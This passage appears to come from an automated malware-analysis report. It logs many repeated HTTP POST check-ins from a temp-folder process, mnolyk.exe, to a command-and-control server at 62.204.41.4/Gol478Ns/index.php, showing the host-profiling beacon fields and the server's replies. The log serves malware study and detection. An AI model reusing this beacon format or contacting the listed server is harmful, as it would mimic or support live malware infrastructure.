                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.752957106 CET518INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      404192.168.2.75009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:50.963557959 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.029182911 CET519INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      405192.168.2.75010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:51.207784891 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.273344040 CET520INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      406192.168.2.75010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:51.475050926 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.541920900 CET521INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      407192.168.2.75010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:51.747853041 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:51.813720942 CET522INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      408192.168.2.75010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:51.993571043 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.057198048 CET523INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      409192.168.2.75010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:52.249237061 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.314605951 CET524INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      41192.168.2.74973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:11.564677000 CET145OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.630836010 CET145INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      410192.168.2.75010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:52.555967093 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.620795965 CET525INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      411192.168.2.75010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:52.814624071 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:52.877818108 CET526INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      412192.168.2.75010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:53.058284998 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.122720003 CET527INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      413192.168.2.75010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:53.335185051 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.401114941 CET528INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      414192.168.2.75010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:53.586754084 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.653393984 CET529INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      415192.168.2.75011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:53.827948093 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.893883944 CET530INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      416192.168.2.75011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:54.086077929 CET531OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.151463032 CET531INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      417192.168.2.75011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:54.333220005 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.396852970 CET532INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      418192.168.2.75011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:54.584709883 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.649357080 CET533INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      419192.168.2.75011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:54.813585997 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.876275063 CET534INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      42192.168.2.74973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:11.796308994 CET146OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.859110117 CET146INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      420192.168.2.75011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:55.052783012 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.117238998 CET535INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
